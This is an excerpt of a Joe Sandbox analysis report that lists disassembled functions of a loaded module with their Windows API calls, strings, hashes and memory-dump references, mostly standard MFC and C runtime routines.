                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6C51AF00,6C516DDD,6C5168AD,?,6C524902,?), ref: 6C51BE77
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6C51BEE3
                                          • _memset.LIBCMT ref: 6C51BF02
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6C51BF13
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C51BF34
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                          • String ID:
                                          • API String ID: 1891723912-0
                                          • Opcode ID: de296a86bb8ec7d16f6b40b7abd1ae77aab3d3ed909d282ed87c9914923d61b5
                                          • Instruction ID: fda2cbbfcf16f91c30515102bc67d9a99acd2166fe14e40ba1ace17a1c85c621
                                          • Opcode Fuzzy Hash: de296a86bb8ec7d16f6b40b7abd1ae77aab3d3ed909d282ed87c9914923d61b5
                                          • Instruction Fuzzy Hash: 1A316DB4508605EFEB24EF14CC89C6AB7B1EF41314B20C62AE66A96F50DB31AD54CF91
                                          Function 6C5181FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6C51815A: GetParent.USER32(?), ref: 6C5181AE
                                            • Part of subcall function 6C51815A: GetLastActivePopup.USER32(?), ref: 6C5181BF
                                            • Part of subcall function 6C51815A: IsWindowEnabled.USER32(?), ref: 6C5181D3
                                            • Part of subcall function 6C51815A: EnableWindow.USER32(?,00000000), ref: 6C5181E6
                                          • EnableWindow.USER32(?,00000001), ref: 6C518247
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 6C51825B
                                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6C518265
                                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6C51827D
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6C5182F9
                                          • EnableWindow.USER32(00000000,00000001), ref: 6C518340
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                          • String ID: 8mQl
                                          • API String ID: 1877664794-3010467399
                                          • Opcode ID: c25e29ff28e49d0baadb0901a878b8c495c0ffb8cd0c80c27b0f46fec99ab9d3
                                          • Instruction ID: 50e7c8988bb2fb010b50be86ac7157b5d1c124f27bd450ab5c5e04e4ef873b1d
                                          • Opcode Fuzzy Hash: c25e29ff28e49d0baadb0901a878b8c495c0ffb8cd0c80c27b0f46fec99ab9d3
                                          • Instruction Fuzzy Hash: CA41D631A456189BEB31CF64CC8CBDA77B4FF45314F25059AE528E6A81D770DE808B92
                                          Function 6C51DE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C51DED6
                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6C51DF00
                                          • GetSystemMetrics.USER32(00000000), ref: 6C51DF17
                                          • GetSystemMetrics.USER32(00000001), ref: 6C51DF1E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6C51DF49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                          • String ID: B$DISPLAY
                                          • API String ID: 381819527-3316187204
                                          • Opcode ID: dc0f2f13fb2f793eefb600d90223e6879917cd0adcb640287b3954cc109b0da9
                                          • Instruction ID: add8ab3dcc900a7121bac536b5a8a8eed10013a12f13abac775d7969f2076d5f
                                          • Opcode Fuzzy Hash: dc0f2f13fb2f793eefb600d90223e6879917cd0adcb640287b3954cc109b0da9
                                          • Instruction Fuzzy Hash: 8C210D71609324AFEF128F14CC88B577BA9EF46765F114116FD189BA81E7B0D940CBA1
                                          Function 6C51D07E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6C51D0AE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C51D0D1
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C51D0ED
                                          • RegCloseKey.ADVAPI32(?), ref: 6C51D0FD
                                          • RegCloseKey.ADVAPI32(?), ref: 6C51D107
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CloseCreate$Open
                                          • String ID: software
                                          • API String ID: 1740278721-2010147023
                                          • Opcode ID: 8d87995dce0544905ca1b0afd5dfdab02f3a9d58f1b0c7c2238643f7e2178d4a
                                          • Instruction ID: c2de20c150d78fa078209b98e7a776600c0982484814dc8bb283f04dacc80c69
                                          • Opcode Fuzzy Hash: 8d87995dce0544905ca1b0afd5dfdab02f3a9d58f1b0c7c2238643f7e2178d4a
                                          • Instruction Fuzzy Hash: 67112872D00118BBDB21DA8ACD88CDFBFBDEFC9714B1000AAF504A2111E7309A00DBA0
                                          Function 6C52FE0E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6C52FE1A
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __amsg_exit.LIBCMT ref: 6C52FE3A
                                          • __lock.LIBCMT ref: 6C52FE4A
                                          • InterlockedDecrement.KERNEL32(?), ref: 6C52FE67
                                          • InterlockedIncrement.KERNEL32(02AC28D8), ref: 6C52FE92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                          • String ID: $Tl
                                          • API String ID: 4271482742-618736445
                                          • Opcode ID: 5071537658bb8596701f3c3df1efbdb3d53744437fe0495e0bced6b691d0235e
                                          • Instruction ID: 3d28334d2a30d766f378f7a66701e98b29b41f48b05adb457aec9737ec081e86
                                          • Opcode Fuzzy Hash: 5071537658bb8596701f3c3df1efbdb3d53744437fe0495e0bced6b691d0235e
                                          • Instruction Fuzzy Hash: 8F01C432A02735DBDB52AB659C08B8D73F0AF45728F110309E814A7BD0D73CA941DBD5
                                          Function 6C51CA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000000), ref: 6C51CA85
                                          • SetErrorMode.KERNEL32(00000000), ref: 6C51CA8D
                                            • Part of subcall function 6C51A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C51A6D0
                                            • Part of subcall function 6C51A698: SetLastError.KERNEL32(0000006F), ref: 6C51A6E7
                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C51CADC
                                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6C51CAEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                                          • String ID: NotifyWinEvent$user32.dll
                                          • API String ID: 1146408833-597752486
                                          • Opcode ID: df95042bdd0018b30b57c2939d59fe0298d083ed8c5cd01c40150a6038d30b6c
                                          • Instruction ID: af7b73f2458df6522ef377588caa7e87af3e2d98e9eda09e3a745d7609f83834
                                          • Opcode Fuzzy Hash: df95042bdd0018b30b57c2939d59fe0298d083ed8c5cd01c40150a6038d30b6c
                                          • Instruction Fuzzy Hash: 4801B1706082149FEB16EF64CC0CA9A3BE8DF85314F05845AE909D7F40EF35D8448B66
                                          Function 6C51CD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(0000000F), ref: 6C51CD2E
                                          • GetSysColor.USER32(00000010), ref: 6C51CD35
                                          • GetSysColor.USER32(00000014), ref: 6C51CD3C
                                          • GetSysColor.USER32(00000012), ref: 6C51CD43
                                          • GetSysColor.USER32(00000006), ref: 6C51CD4A
                                          • GetSysColorBrush.USER32(0000000F), ref: 6C51CD57
                                          • GetSysColorBrush.USER32(00000006), ref: 6C51CD5E
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Color$Brush
                                          • String ID:
                                          • API String ID: 2798902688-0
                                          • Opcode ID: 66c61a478027775f5d996f63da4b2bb0c76a48c0dcd8390ae2f97ee2fbf7c7ff
                                          • Instruction ID: 035816e5d3ed3949f48dc46c3915e81a347c780c14ea5bb120eca426185ba721
                                          • Opcode Fuzzy Hash: 66c61a478027775f5d996f63da4b2bb0c76a48c0dcd8390ae2f97ee2fbf7c7ff
                                          • Instruction Fuzzy Hash: F1F0FE71A407445BDB30BB724D09B47BAE1FFC4710F16092FE2458BA90E6B6E441DF44
                                          Function 6C52C416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 6C52C43E
                                            • Part of subcall function 6C524FC4: __getptd.LIBCMT ref: 6C524FD2
                                            • Part of subcall function 6C524FC4: __getptd.LIBCMT ref: 6C524FE0
                                          • __getptd.LIBCMT ref: 6C52C448
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __getptd.LIBCMT ref: 6C52C456
                                          • __getptd.LIBCMT ref: 6C52C464
                                          • __getptd.LIBCMT ref: 6C52C46F
                                          • _CallCatchBlock2.LIBCMT ref: 6C52C495
                                            • Part of subcall function 6C525069: __CallSettingFrame@12.LIBCMT ref: 6C5250B5
                                            • Part of subcall function 6C52C53C: __getptd.LIBCMT ref: 6C52C54B
                                            • Part of subcall function 6C52C53C: __getptd.LIBCMT ref: 6C52C559
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 1602911419-0
                                          • Opcode ID: b377c2502e1656f1cfc9bf6fb712146c56667d0fb870680bedc55081f34091aa
                                          • Instruction ID: e4f715ac7f6fc006a26da074c71d417578dcf919070f999505c5aec0d70ae71f
                                          • Opcode Fuzzy Hash: b377c2502e1656f1cfc9bf6fb712146c56667d0fb870680bedc55081f34091aa
                                          • Instruction Fuzzy Hash: 4011E2B1C00209DFDF01EFA4C844AEDBBF1FB58318F10846AE814A7791EB799A199B50
                                          Function 6C522932 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: _memset
                                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                          • API String ID: 2102423945-1093365818
                                          • Opcode ID: 0b8155d3034d7b8dfa303fc9866900c98b6627d63b9ffd5db1236a4df67989b1
                                          • Instruction ID: 77061a8d2f2dbec4030035c26f6bb96e96323bdb02b2950d0e1cb5507e91d849
                                          • Opcode Fuzzy Hash: 0b8155d3034d7b8dfa303fc9866900c98b6627d63b9ffd5db1236a4df67989b1
                                          • Instruction Fuzzy Hash: 29912576D1124DAEDB40CF94CD85BDEBBF8AF84358F208165ED18E66C0E7789A44C7A0
                                          Function 6C52140F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6C51C220: RtlEnterCriticalSection.NTDLL(6C5434A8), ref: 6C51C25A
                                            • Part of subcall function 6C51C220: RtlInitializeCriticalSection.NTDLL(?), ref: 6C51C26C
                                            • Part of subcall function 6C51C220: RtlLeaveCriticalSection.NTDLL(6C5434A8), ref: 6C51C279
                                            • Part of subcall function 6C51C220: RtlEnterCriticalSection.NTDLL(?), ref: 6C51C289
                                            • Part of subcall function 6C51BB0C: __EH_prolog3_catch.LIBCMT ref: 6C51BB13
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6C521458
                                          • FreeLibrary.KERNEL32(?), ref: 6C521468
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                          • String ID: (QTl$HtmlHelpW$hhctrl.ocx
                                          • API String ID: 2853499158-1688265336
                                          • Opcode ID: 85990de8673c43c5a9bae022b1579a8d74de503f6513bd6f175244554491f52a
                                          • Instruction ID: fd3421f94975a00878917ff21082e8ec2a98f3bfbea4245917ab66b42308fbbd
                                          • Opcode Fuzzy Hash: 85990de8673c43c5a9bae022b1579a8d74de503f6513bd6f175244554491f52a
                                          • Instruction Fuzzy Hash: 4901D631504716E7D7216B65CC08F8B3BE0EF40359F00CA26F49F95E90DB76DC109691
                                          Function 6C52C165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6C52C17F
                                            • Part of subcall function 6C52A27F: __getptd_noexit.LIBCMT ref: 6C52A282
                                            • Part of subcall function 6C52A27F: __amsg_exit.LIBCMT ref: 6C52A28F
                                          • __getptd.LIBCMT ref: 6C52C190
                                          • __getptd.LIBCMT ref: 6C52C19E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: MOC$csm
                                          • API String ID: 803148776-1389381023
                                          • Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                                          • Instruction ID: 6583ddd962504f50f4fed9277d62721c25baf6e906dc54249b30264f2cff7580
                                          • Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                                          • Instruction Fuzzy Hash: C5E04F31514204CFE700EBB4CC46B5837E4EBA9318F2501A2D40CCBBE2D73DE944C942
                                          Function 6C515670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,6C5149D6,?,00000003), ref: 6C515685
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6C5156B4
                                          • GetLastError.KERNEL32 ref: 6C5156C5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6C5156E5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6C515709
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                          • String ID:
                                          • API String ID: 3322701435-0
                                          • Opcode ID: 04a960d132bc699f1e80ff72fe284bcd89b5468a519d89130c0353fbae420405
                                          • Instruction ID: 865a799e9f92d85d9ecd5237aa004b524312116e4b0d03ef844be1b8a195b174
                                          • Opcode Fuzzy Hash: 04a960d132bc699f1e80ff72fe284bcd89b5468a519d89130c0353fbae420405
                                          • Instruction Fuzzy Hash: 7C11E174384301ABE620DE64CCC5F2773ADEB85744F200929F682D7780D670BC0C8679
                                          Function 6C51815A Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ParentWindow$ActiveEnableEnabledLastPopup
                                          • String ID:
                                          • API String ID: 2630416829-0
                                          • Opcode ID: 47d86205bd95e6cf61ce213cc009644ddd9e32b3484b725d597dbd87f0252f8e
                                          • Instruction ID: 8573695e4dc0c424e5088918ac369c1a5d62bbfc7fcd4d914a0c2353872e2f79
                                          • Opcode Fuzzy Hash: 47d86205bd95e6cf61ce213cc009644ddd9e32b3484b725d597dbd87f0252f8e
                                          • Instruction Fuzzy Hash: 3811E73368E620ABF732065A8C4CB5A72B86F46B78F1B0253EC14EBF04D764C90146D7
                                          Function 6C51DA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?), ref: 6C51DA3D
                                          • _memset.LIBCMT ref: 6C51DA5B
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6C51DA75
                                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6C51DA87
                                          • SetWindowTextW.USER32(00000000,?), ref: 6C51DA93
                                            • Part of subcall function 6C516DC1: __CxxThrowException@8.LIBCMT ref: 6C516DD7
                                            • Part of subcall function 6C516DC1: __EH_prolog3.LIBCMT ref: 6C516DE4
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                          • String ID:
                                          • API String ID: 4273134663-0
                                          • Opcode ID: c58ab6d32c370de5920b470d59339fa73a0ba8ed9a298171911dde05f95db777
                                          • Instruction ID: c5ff8b0594b3c0dea77947f93bf578f9d6714caa2ec7d1fdd369969fcf01b7a9
                                          • Opcode Fuzzy Hash: c58ab6d32c370de5920b470d59339fa73a0ba8ed9a298171911dde05f95db777
                                          • Instruction Fuzzy Hash: 4D01C0B6605319A7DB11EAB48C8CDDFB3BDEF85704F014466E909D3B01EA34DA0887A0
                                          Function 6C51DB5C Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 6C51DB6D
                                          • GetDlgCtrlID.USER32(00000000), ref: 6C51DB81
                                          • GetWindowRect.USER32(00000000,?), ref: 6C51DBA3
                                          • PtInRect.USER32(?,?,?), ref: 6C51DBB3
                                          • GetWindow.USER32(?,00000005), ref: 6C51DBC0
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: RectWindow$ClientCtrlScreen
                                          • String ID:
                                          • API String ID: 4072766398-0
                                          • Opcode ID: 9a3ce8154205f2bac247a81c89a5a7ee86988bbb2915f68f896079ca0fc8efbf
                                          • Instruction ID: d412ee3ca5903fe4953a6b66c3fcfafc0cb779094b5bd44d3598dbb34fb2e125
                                          • Opcode Fuzzy Hash: 9a3ce8154205f2bac247a81c89a5a7ee86988bbb2915f68f896079ca0fc8efbf
                                          • Instruction Fuzzy Hash: 4401A232204029BBEF229B598C0CE9E3B7CFF42350F014522F916DA780E734D615CB99
                                          Function 6C524618 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __lock.LIBCMT ref: 6C524636
                                            • Part of subcall function 6C52A914: __mtinitlocknum.LIBCMT ref: 6C52A92A
                                            • Part of subcall function 6C52A914: __amsg_exit.LIBCMT ref: 6C52A936
                                            • Part of subcall function 6C52A914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6C52A93E
                                          • ___sbh_find_block.LIBCMT ref: 6C524641
                                          • ___sbh_free_block.LIBCMT ref: 6C524650
                                          • HeapFree.KERNEL32(00000000,00000000,6C53E828,0000000C,6C52A270,00000000,?,6C52A5D4,00000000,00000001,00000000,?,6C52A89E,00000018,6C53E978,0000000C), ref: 6C524680
